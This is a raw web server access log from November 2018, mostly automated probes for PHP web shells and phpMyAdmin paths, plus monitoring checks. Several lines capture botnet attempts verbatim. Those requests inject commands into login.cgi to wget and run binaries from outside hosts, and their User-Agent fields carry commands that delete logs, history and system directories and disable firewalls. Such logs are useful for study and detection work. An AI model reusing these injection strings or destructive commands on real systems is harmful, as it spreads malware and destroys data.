118.24.76.181 - - [01/Nov/2018:21:55:20 +0100] "POST /xxx.php HTTP/1.1" 404 312 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36"
118.24.76.181 - - [01/Nov/2018:21:55:20 +0100] "POST /92.php HTTP/1.1" 404 311 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36"
118.24.76.181 - - [01/Nov/2018:21:55:21 +0100] "POST /z.php HTTP/1.1" 404 310 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36"
118.24.76.181 - - [01/Nov/2018:21:55:21 +0100] "POST /x.php HTTP/1.1" 404 310 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36"
118.24.76.181 - - [01/Nov/2018:21:55:22 +0100] "POST /dexgp.php HTTP/1.1" 404 314 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36"
118.24.76.181 - - [01/Nov/2018:21:55:22 +0100] "POST /nuoxi.php HTTP/1.1" 404 314 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36"
118.24.76.181 - - [01/Nov/2018:21:55:23 +0100] "POST /godkey.php HTTP/1.1" 404 315 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36"
118.24.76.181 - - [01/Nov/2018:21:55:23 +0100] "POST /okokok.php HTTP/1.1" 404 315 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36"
212.91.246.72 - - [01/Nov/2018:21:55:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
118.24.76.181 - - [01/Nov/2018:21:55:23 +0100] "POST /erwa.php HTTP/1.1" 404 313 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36"
118.24.76.181 - - [01/Nov/2018:21:55:24 +0100] "POST /pma.php HTTP/1.1" 404 312 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36"
118.24.76.181 - - [01/Nov/2018:21:55:24 +0100] "POST /ruyi.php HTTP/1.1" 404 313 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36"
118.24.76.181 - - [01/Nov/2018:21:55:24 +0100] "POST /51314.php HTTP/1.1" 404 314 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36"
118.24.76.181 - - [01/Nov/2018:21:55:24 +0100] "POST /5201314.php HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36"
118.24.76.181 - - [01/Nov/2018:21:55:25 +0100] "POST /fusheng.php HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36"
118.24.76.181 - - [01/Nov/2018:21:55:25 +0100] "POST /general.php HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36"
118.24.76.181 - - [01/Nov/2018:21:55:25 +0100] "POST /repeat.php HTTP/1.1" 404 315 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36"
118.24.76.181 - - [01/Nov/2018:21:55:26 +0100] "POST /ldw.php HTTP/1.1" 404 312 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36"
118.24.76.181 - - [01/Nov/2018:21:55:26 +0100] "POST /api.php HTTP/1.1" 404 312 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36"
118.24.76.181 - - [01/Nov/2018:21:55:26 +0100] "POST /s1.php HTTP/1.1" 404 311 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36"
118.24.76.181 - - [01/Nov/2018:21:55:27 +0100] "POST /xiaodai.php HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36"
118.24.76.181 - - [01/Nov/2018:21:55:27 +0100] "POST /hello.php HTTP/1.1" 404 314 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36"
118.24.76.181 - - [01/Nov/2018:21:55:27 +0100] "POST /xp.php HTTP/1.1" 404 311 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36"
118.24.76.181 - - [01/Nov/2018:21:55:28 +0100] "POST /1.php HTTP/1.1" 404 310 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36"
118.24.76.181 - - [01/Nov/2018:21:55:28 +0100] "POST /2.php HTTP/1.1" 404 310 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36"
118.24.76.181 - - [01/Nov/2018:21:55:28 +0100] "POST /p.php HTTP/1.1" 404 310 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36"
118.24.76.181 - - [01/Nov/2018:21:55:28 +0100] "POST /1.php HTTP/1.1" 404 310 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36"
118.24.76.181 - - [01/Nov/2018:21:55:29 +0100] "POST /a.php HTTP/1.1" 404 310 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36"
118.24.76.181 - - [01/Nov/2018:21:55:29 +0100] "POST /m.php HTTP/1.1" 404 310 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36"
118.24.76.181 - - [01/Nov/2018:21:55:29 +0100] "POST /conf.php HTTP/1.1" 404 313 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36"
118.24.76.181 - - [01/Nov/2018:21:55:30 +0100] "POST /123.php HTTP/1.1" 404 312 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36"
118.24.76.181 - - [01/Nov/2018:21:55:30 +0100] "POST /HX.php HTTP/1.1" 404 311 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36"
118.24.76.181 - - [01/Nov/2018:21:55:30 +0100] "POST /diy.php HTTP/1.1" 404 312 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36"
118.24.76.181 - - [01/Nov/2018:21:55:31 +0100] "POST /666.php HTTP/1.1" 404 312 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36"
118.24.76.181 - - [01/Nov/2018:21:55:32 +0100] "POST /777.php HTTP/1.1" 404 312 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36"
118.24.76.181 - - [01/Nov/2018:21:55:33 +0100] "POST /qwq.php HTTP/1.1" 404 312 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36"
118.24.76.181 - - [01/Nov/2018:21:55:34 +0100] "POST /.php HTTP/1.1" 404 309 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36"
118.24.76.181 - - [01/Nov/2018:21:55:35 +0100] "POST /infos.php HTTP/1.1" 404 314 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36"
118.24.76.181 - - [01/Nov/2018:21:55:38 +0100] "POST /x.php HTTP/1.1" 404 310 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36"
118.24.76.181 - - [01/Nov/2018:21:55:38 +0100] "POST /htfr.php HTTP/1.1" 404 313 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36"
118.24.76.181 - - [01/Nov/2018:21:55:38 +0100] "POST /zzk.php HTTP/1.1" 404 312 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36"
118.24.76.181 - - [01/Nov/2018:21:55:39 +0100] "POST /toor.php HTTP/1.1" 404 313 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36"
118.24.76.181 - - [01/Nov/2018:21:55:39 +0100] "POST /xiaoma.php HTTP/1.1" 404 315 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36"
42.145.134.171 - - [01/Nov/2018:21:55:40 +0100] "GET /login.cgi?cli=aa%20aa%27;wget%20http://80.211.203.234/bin%20-O%20-%3E%20/tmp/hk;sh%20/tmp/hk%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0;rm -rf /tmp/* /var/* /var/run/* /var/tmp/*;rm -rf /var/log/wtmp;rm -rf ~/.bash_history;history -c;history -w;rm -rf /tmp/*;history -c;rm -rf /bin/netstat;history -w;pkill -9 busybox;pkill -9 perl;service iptables stop;/sbin/iptables -F;/sbin/iptables -X;service firewalld stop;"
118.24.76.181 - - [01/Nov/2018:21:55:42 +0100] "POST /xiaomae.php HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36"
118.24.76.181 - - [01/Nov/2018:21:55:43 +0100] "POST /xiaomar.php HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36"
118.24.76.181 - - [01/Nov/2018:21:55:43 +0100] "POST /qq.php HTTP/1.1" 404 311 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36"
118.24.76.181 - - [01/Nov/2018:21:55:45 +0100] "POST /data.php HTTP/1.1" 404 313 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36"
118.24.76.181 - - [01/Nov/2018:21:55:46 +0100] "POST /log.php HTTP/1.1" 404 312 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36"
118.24.76.181 - - [01/Nov/2018:21:55:46 +0100] "POST /fack.php HTTP/1.1" 404 313 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36"
118.24.76.181 - - [01/Nov/2018:21:55:46 +0100] "POST /angge.php HTTP/1.1" 404 314 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36"
118.24.76.181 - - [01/Nov/2018:21:55:47 +0100] "GET /index.php HTTP/1.1" 404 314 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0"
118.24.76.181 - - [01/Nov/2018:21:55:47 +0100] "GET /phpmyadmin/index.php HTTP/1.1" 404 325 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0"
118.24.76.181 - - [01/Nov/2018:21:55:47 +0100] "GET /phpMyAdmin/index.php HTTP/1.1" 404 325 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0"
118.24.76.181 - - [01/Nov/2018:21:55:48 +0100] "GET /pmd/index.php HTTP/1.1" 404 318 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0"
118.24.76.181 - - [01/Nov/2018:21:55:48 +0100] "GET /pma/index.php HTTP/1.1" 404 318 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0"
118.24.76.181 - - [01/Nov/2018:21:55:48 +0100] "GET /PMA/index.php HTTP/1.1" 404 318 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0"
118.24.76.181 - - [01/Nov/2018:21:55:49 +0100] "GET /PMA2/index.php HTTP/1.1" 404 319 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0"
118.24.76.181 - - [01/Nov/2018:21:55:50 +0100] "GET /pmamy/index.php HTTP/1.1" 404 320 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0"
118.24.76.181 - - [01/Nov/2018:21:55:50 +0100] "GET /pmamy2/index.php HTTP/1.1" 404 321 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0"
118.24.76.181 - - [01/Nov/2018:21:55:51 +0100] "GET /mysql/index.php HTTP/1.1" 404 320 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0"
118.24.76.181 - - [01/Nov/2018:21:55:51 +0100] "GET /admin/index.php HTTP/1.1" 404 320 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0"
118.24.76.181 - - [01/Nov/2018:21:55:51 +0100] "GET /db/index.php HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0"
118.24.76.181 - - [01/Nov/2018:21:55:52 +0100] "GET /dbadmin/index.php HTTP/1.1" 404 322 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0"
118.24.76.181 - - [01/Nov/2018:21:55:52 +0100] "GET /web/phpMyAdmin/index.php HTTP/1.1" 404 329 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0"
118.24.76.181 - - [01/Nov/2018:21:55:52 +0100] "GET /admin/pma/index.php HTTP/1.1" 404 324 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0"
118.24.76.181 - - [01/Nov/2018:21:55:53 +0100] "GET /admin/PMA/index.php HTTP/1.1" 404 324 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0"
118.24.76.181 - - [01/Nov/2018:21:55:53 +0100] "GET /admin/mysql/index.php HTTP/1.1" 404 326 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0"
118.24.76.181 - - [01/Nov/2018:21:55:54 +0100] "GET /admin/mysql2/index.php HTTP/1.1" 404 327 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0"
118.24.76.181 - - [01/Nov/2018:21:55:54 +0100] "GET /admin/phpmyadmin/index.php HTTP/1.1" 404 331 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0"
118.24.76.181 - - [01/Nov/2018:21:55:54 +0100] "GET /admin/phpMyAdmin/index.php HTTP/1.1" 404 331 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0"
118.24.76.181 - - [01/Nov/2018:21:55:55 +0100] "GET /admin/phpmyadmin2/index.php HTTP/1.1" 404 332 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0"
118.24.76.181 - - [01/Nov/2018:21:55:55 +0100] "GET /mysqladmin/index.php HTTP/1.1" 404 325 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0"
118.24.76.181 - - [01/Nov/2018:21:55:55 +0100] "GET /mysql-admin/index.php HTTP/1.1" 404 326 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0"
118.24.76.181 - - [01/Nov/2018:21:55:56 +0100] "GET /mysql_admin/index.php HTTP/1.1" 404 326 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0"
118.24.76.181 - - [01/Nov/2018:21:55:56 +0100] "GET /phpadmin/index.php HTTP/1.1" 404 323 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0"
118.24.76.181 - - [01/Nov/2018:21:55:56 +0100] "GET /phpAdmin/index.php HTTP/1.1" 404 323 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0"
118.24.76.181 - - [01/Nov/2018:21:55:56 +0100] "GET /phpmyadmin0/index.php HTTP/1.1" 404 326 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0"
118.24.76.181 - - [01/Nov/2018:21:55:57 +0100] "GET /phpmyadmin1/index.php HTTP/1.1" 404 326 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0"
118.24.76.181 - - [01/Nov/2018:21:55:57 +0100] "GET /phpmyadmin2/index.php HTTP/1.1" 404 326 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0"
118.24.76.181 - - [01/Nov/2018:21:55:57 +0100] "GET /phpMyAdmin-4.4.0/index.php HTTP/1.1" 404 331 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0"
118.24.76.181 - - [01/Nov/2018:21:55:58 +0100] "GET /myadmin/index.php HTTP/1.1" 404 322 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0"
118.24.76.181 - - [01/Nov/2018:21:55:58 +0100] "GET /myadmin2/index.php HTTP/1.1" 404 323 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0"
118.24.76.181 - - [01/Nov/2018:21:55:58 +0100] "GET /xampp/phpmyadmin/index.php HTTP/1.1" 404 331 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0"
118.24.76.181 - - [01/Nov/2018:21:55:59 +0100] "GET /phpMyadmin_bak/index.php HTTP/1.1" 404 329 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0"
118.24.76.181 - - [01/Nov/2018:21:56:01 +0100] "GET /www/phpMyAdmin/index.php HTTP/1.1" 404 329 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0"
118.24.76.181 - - [01/Nov/2018:21:56:03 +0100] "GET /tools/phpMyAdmin/index.php HTTP/1.1" 404 331 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0"
118.24.76.181 - - [01/Nov/2018:21:56:04 +0100] "GET /phpmyadmin-old/index.php HTTP/1.1" 404 329 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0"
118.24.76.181 - - [01/Nov/2018:21:56:04 +0100] "GET /phpMyAdminold/index.php HTTP/1.1" 404 328 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0"
118.24.76.181 - - [01/Nov/2018:21:56:05 +0100] "GET /phpMyAdmin.old/index.php HTTP/1.1" 404 329 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0"
118.24.76.181 - - [01/Nov/2018:21:56:06 +0100] "GET /pma-old/index.php HTTP/1.1" 404 322 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0"
118.24.76.181 - - [01/Nov/2018:21:56:06 +0100] "GET /claroline/phpMyAdmin/index.php HTTP/1.1" 404 335 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0"
118.24.76.181 - - [01/Nov/2018:21:56:06 +0100] "GET /typo3/phpmyadmin/index.php HTTP/1.1" 404 331 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0"
118.24.76.181 - - [01/Nov/2018:21:56:07 +0100] "GET /phpma/index.php HTTP/1.1" 404 320 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0"
118.24.76.181 - - [01/Nov/2018:21:56:07 +0100] "GET /phpmyadmin/phpmyadmin/index.php HTTP/1.1" 404 336 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0"
118.24.76.181 - - [01/Nov/2018:21:56:07 +0100] "GET /phpMyAdmin/phpMyAdmin/index.php HTTP/1.1" 404 336 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0"
118.24.76.181 - - [01/Nov/2018:21:56:08 +0100] "GET /phpMyAbmin/index.php HTTP/1.1" 404 325 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0"
118.24.76.181 - - [01/Nov/2018:21:56:10 +0100] "GET /phpMyAdmin__/index.php HTTP/1.1" 404 327 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0"
118.24.76.181 - - [01/Nov/2018:21:56:10 +0100] "GET /phpMyAdmin+++---/index.php HTTP/1.1" 404 331 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0"
118.24.76.181 - - [01/Nov/2018:21:56:10 +0100] "GET /v/index.php HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0"
118.24.76.181 - - [01/Nov/2018:21:56:11 +0100] "GET /phpmyadm1n/index.php HTTP/1.1" 404 325 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0"
118.24.76.181 - - [01/Nov/2018:21:56:11 +0100] "GET /phpMyAdm1n/index.php HTTP/1.1" 404 325 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0"
118.24.76.181 - - [01/Nov/2018:21:56:11 +0100] "GET /shaAdmin/index.php HTTP/1.1" 404 323 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0"
118.24.76.181 - - [01/Nov/2018:21:56:12 +0100] "GET /phpMyadmi/index.php HTTP/1.1" 404 324 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0"
118.24.76.181 - - [01/Nov/2018:21:56:12 +0100] "GET /phpMyAdmion/index.php HTTP/1.1" 404 326 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0"
118.24.76.181 - - [01/Nov/2018:21:56:12 +0100] "GET /MyAdmin/index.php HTTP/1.1" 404 322 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0"
118.24.76.181 - - [01/Nov/2018:21:56:13 +0100] "GET /phpMyAdmin1/index.php HTTP/1.1" 404 326 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0"
212.91.246.72 - - [01/Nov/2018:21:56:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Nov/2018:21:57:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
85.93.20.102 - - [01/Nov/2018:21:58:11 +0100] "\x03" 501 316 "-" "-"
212.91.246.72 - - [01/Nov/2018:21:58:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
85.93.20.102 - - [01/Nov/2018:21:58:34 +0100] "\x03" 501 316 "-" "-"
197.53.105.36 - - [01/Nov/2018:21:59:05 +0100] "GET /login.cgi?cli=aa ;wget http://80.211.94.16/Azomip.mips -O /tmp/vv ;sh /tmp/vv ;wget http://80.211.94.16/Azomip.mpsl -O /tmp/cc ;sh /tmp/cc ;wget http://80.211.94.16/Azomip.arm4 -O /tmp/dd ;sh /tmp/dd HTTP/1.1" 404 310 "-" "Azomip/2.0;rm -rf /tmp/* /var/* /var/run/* /var/tmp/*;rm -rf /var/log/wtmp;rm -rf ~/.bash_history;history -c;history -w;rm -rf /tmp/*;history -c;rm -rf /bin/netstat;history -w;pkill -9 busybox;pkill -9 perl;service iptables stop;/sbin/iptables -F;/sbin/iptables -X;service firewalld stop;"
212.91.246.72 - - [01/Nov/2018:21:59:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
41.233.155.197 - - [01/Nov/2018:22:00:23 +0100] "GET /login.cgi?cli=aa ;wget http://80.211.94.16/Azomip.mips -O /tmp/vv ;sh /tmp/vv ;wget http://80.211.94.16/Azomip.mpsl -O /tmp/cc ;sh /tmp/cc ;wget http://80.211.94.16/Azomip.arm4 -O /tmp/dd ;sh /tmp/dd HTTP/1.1" 404 310 "-" "Azomip/2.0;rm -rf /tmp/* /var/* /var/run/* /var/tmp/*;rm -rf /var/log/wtmp;rm -rf ~/.bash_history;history -c;history -w;rm -rf /tmp/*;history -c;rm -rf /bin/netstat;history -w;pkill -9 busybox;pkill -9 perl;service iptables stop;/sbin/iptables -F;/sbin/iptables -X;service firewalld stop;"
212.91.246.72 - - [01/Nov/2018:22:00:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
156.220.142.242 - - [01/Nov/2018:22:00:39 +0100] "GET /login.cgi?cli=aa ;wget http://80.211.94.16/Azomip.mips -O /tmp/vv ;sh /tmp/vv ;wget http://80.211.94.16/Azomip.mpsl -O /tmp/cc ;sh /tmp/cc ;wget http://80.211.94.16/Azomip.arm4 -O /tmp/dd ;sh /tmp/dd HTTP/1.1" 404 310 "-" "Azomip/2.0;rm -rf /tmp/* /var/* /var/run/* /var/tmp/*;rm -rf /var/log/wtmp;rm -rf ~/.bash_history;history -c;history -w;rm -rf /tmp/*;history -c;rm -rf /bin/netstat;history -w;pkill -9 busybox;pkill -9 perl;service iptables stop;/sbin/iptables -F;/sbin/iptables -X;service firewalld stop;"
